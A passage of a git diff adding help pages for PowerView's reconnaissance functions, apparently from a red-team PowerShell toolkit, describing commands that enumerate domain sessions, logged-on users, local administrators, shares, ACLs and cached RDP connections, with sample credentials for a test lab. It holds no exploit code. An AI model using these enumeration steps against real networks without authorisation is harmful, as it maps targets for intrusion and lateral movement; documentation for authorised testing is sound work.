+Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md new file mode 100755 index 00000000..29ac4d6b --- /dev/null +++ b/docs/Recon/Get-NetLocalGroup.md @@ -0,0 +1,132 @@ +# Get-NetLocalGroup + +## SYNOPSIS +Enumerates the local groups on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Get-NetLocalGroup [[-ComputerName] ] [-Method ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. +By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). +Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroup +``` + +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroup -Method Winnt +``` + +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... +WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... +S-1-5-32-569 Members are author... +... + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup -ComputerName primary.testlab.local +``` + +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroup.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroup.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md new file mode 100755 index 00000000..302302bd --- /dev/null +++ b/docs/Recon/Get-NetLocalGroupMember.md @@ -0,0 +1,212 @@ +# Get-NetLocalGroupMember + +## SYNOPSIS +Enumerates members of a specific local group on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName + +## SYNTAX + +``` +Get-NetLocalGroupMember [[-ComputerName] ] [-GroupName ] [-Method ] + [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the members of a specified local group on the +current, or remote, machine. +By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). +Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroupMember -Method winnt | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup | Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... +False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... +S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... +S-1-5-21-25... +False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... +S-1-5-21-89... +True UNKNOWN + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... +Administrators TESTLAB\Adm... +S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\loc... +S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\Ent... +S-1-5-21-89... +True False +primary.tes... +Administrators TESTLAB\Dom... +S-1-5-21-89... +True False + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md new file mode 100755 index 00000000..024d1b25 --- /dev/null +++ b/docs/Recon/Get-NetLoggedon.md @@ -0,0 +1,100 @@ +# Get-NetLoggedon + +## SYNOPSIS +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetLoggedon [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLoggedon +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLoggedon -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetLoggedon +``` + +Returns all logged on users for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LoggedOnUserInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md new file mode 100755 index 00000000..ff18322e --- /dev/null +++ b/docs/Recon/Get-NetRDPSession.md @@ -0,0 +1,104 @@ +# Get-NetRDPSession + +## SYNOPSIS +Returns remote desktop/session information for the local (or a remote) machine. + +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetRDPSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. +This is a replacement for qwinsta. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetRDPSession -ComputerName "sqlserver" +``` + +Returns active RDP/terminal sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RDPSessionInfo + +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md new file mode 100755 index 00000000..d9e2f50a --- /dev/null +++ b/docs/Recon/Get-NetSession.md @@ -0,0 +1,99 @@ +# Get-NetSession + +## SYNOPSIS +Returns session information for the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetSession +``` + +Returns active sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetSession -ComputerName sqlserver +``` + +Returns active sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetSession +``` + +Returns active sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SessionInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md new file mode 100755 index 00000000..b3f2abe6 --- /dev/null +++ b/docs/Recon/Get-NetShare.md @@ -0,0 +1,100 @@ +# Get-NetShare + +## SYNOPSIS +Returns open shares on the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetShare [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. +This is a replacement for "net share \\\\hostname". + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetShare +``` + +Returns active shares on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetShare -ComputerName sqlserver +``` + +Returns active shares on the 'sqlserver' host + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetShare +``` + +Returns all shares for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md new file mode 100755 index 00000000..448212fd --- /dev/null +++ b/docs/Recon/Get-PathAcl.md @@ -0,0 +1,94 @@ +# Get-PathAcl + +## SYNOPSIS +Enumerates the ACL for a given file path. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID + +## SYNTAX + +``` +Get-PathAcl [-Path] [[-Credential] ] +``` + +## DESCRIPTION +Enumerates the ACL for a specified file/folder path, and translates +the access rules for each entry into readable formats. +If -Credential is passed, +Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-PathAcl "\\SERVER\Share\" +``` + +Returns ACLs for the given UNC share. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +gci .\test.txt | Get-PathAcl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred + +## PARAMETERS + +### -Path +Specifies the local or remote path to enumerate the ACLs for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target path. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +One of more paths to enumerate ACLs for. + +## OUTPUTS + +### PowerView.FileACL + +A custom object with the full path and associated ACL entries. + +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md new file mode 100755 index 00000000..2fd6e091 --- /dev/null +++ b/docs/Recon/Get-RegLoggedOn.md @@ -0,0 +1,89 @@ +# Get-RegLoggedOn + +## SYNOPSIS +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. + +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. + +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID + +## SYNTAX + +``` +Get-RegLoggedOn [[-ComputerName] ] +``` + +## DESCRIPTION +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. +Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegLoggedOn +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-RegLoggedOn -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-RegLoggedOn +``` + +Returns users actively logged on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegLoggedOnUser + +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md new file mode 100755 index 00000000..481dbb61 --- /dev/null +++ b/docs/Recon/Get-WMIProcess.md @@ -0,0 +1,80 @@ +# Get-WMIProcess + +## SYNOPSIS +Returns a list of processes and their owners on the local or remote machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIProcess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, +including the owners of the particular process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIProcess -ComputerName WINDOWS1 +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +A PSCustomObject containing the remote process information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md new file mode 100755 index 00000000..fe602283 --- /dev/null +++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md @@ -0,0 +1,99 @@ +# Get-WMIRegCachedRDPConnection + +## SYNOPSIS +Returns information about RDP connections outgoing from the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegCachedRDPConnection [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to query all entries for the +"Windows Remote Desktop Connection Client" on a machine, separated by +user and target server. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegCachedRDPConnection +``` + +Returns the RDP connection client information for the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local +``` + +Returns the RDP connection client information for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegCachedRDPConnection +``` + +Returns cached RDP information for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.CachedRDPConnection + +A PSCustomObject containing the ComputerName and cached RDP information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md new file mode 100755 index 00000000..bed39e03 --- /dev/null +++ b/docs/Recon/Get-WMIRegLastLoggedOn.md @@ -0,0 +1,98 @@ +# Get-WMIRegLastLoggedOn + +## SYNOPSIS +Returns the last user who logged onto the local (or a remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 +``` + +Returns the last user logged onto WINDOWS1 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LastLoggedOnUser + +A PSCustomObject containing the ComputerName and last loggedon user. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md new file mode 100755 index 00000000..353bcf0c --- /dev/null +++ b/docs/Recon/Get-WMIRegMountedDrive.md @@ -0,0 +1,97 @@ +# Get-WMIRegMountedDrive + +## SYNOPSIS +Returns information about saved network mounted drives for the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to enumerate recently mounted network drives. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for the local machine. + +### -------------------------- 